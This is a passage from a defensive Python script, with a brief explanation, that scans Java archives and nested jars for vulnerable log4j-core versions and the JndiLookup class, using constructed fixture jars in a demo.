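    if version is not None and parse_version(version) >= parse_version(fixed_version):
        return "patched"
    if not present:
        return "mitigated-jndilookup-removed"
    # Old version, or a shaded copy with no pom.properties but the class still inside.
    return "vulnerable"


def scan_archive(path: str, fixed_version: str = FIXED_VERSION) -> Dict[str, str]:
    """Classify the archive and every .jar nested one level inside it (WAR, EAR, fat jar)."""
    results: Dict[str, str] = {}
    with zipfile.ZipFile(path) as zf:
        results[path] = classify(inspect_archive(zf), fixed_version)
        for name in zf.namelist():
            if name.lower().endswith(".jar"):
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    results[f"{path}!{name}"] = classify(inspect_archive(inner), fixed_version)
    return results


def build_fixture_jar(path: str, version: Optional[str], with_jndi_lookup: bool) -> str:
    """Constructed stand-in for a log4j-core jar; the class entry is a magic number, not bytecode."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version is not None:
            zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return path


def demo() -> Dict[str, str]:
    """Scan a set of constructed archives and return {basename[!nested entry]: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        old = build_fixture_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1", True)
        stripped = build_fixture_jar(os.path.join(tmp, "log4j-core-2.14.1-nojndi.jar"), "2.14.1", False)
        fixed = build_fixture_jar(os.path.join(tmp, "log4j-core-fixed.jar"), FIXED_VERSION, True)
        other = build_fixture_jar(os.path.join(tmp, "commons-lang3.jar"), None, False)
        war = os.path.join(tmp, "app.war")  # constructed WAR bundling the old jar under WEB-INF/lib
        with zipfile.ZipFile(war, "w") as zf:
            zf.write(old, "WEB-INF/lib/log4j-core-2.14.1.jar")
            zf.writestr("WEB-INF/web.xml", "<web-app/>")
        report: Dict[str, str] = {}
        for archive in (old, stripped, fixed, other, war):
            for key, status in scan_archive(archive).items():
                outer, _, inner = key.partition("!")
                report[os.path.basename(outer) + ("!" + inner if inner else "")] = status
        return report


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:<30} {name}")
```

    The classifier is deliberately conservative: a jar whose `pom.properties` has been stripped by shading but which still contains `JndiLookup.class` is reported as vulnerable, because the absence of version metadata is not evidence of a fix. In a real inventory you would walk the filesystem and call `scan_archive` on every `.jar`, `.war` and `.ear`, then reconcile the vulnerable entries against the vendor's advisory for the product that ships them.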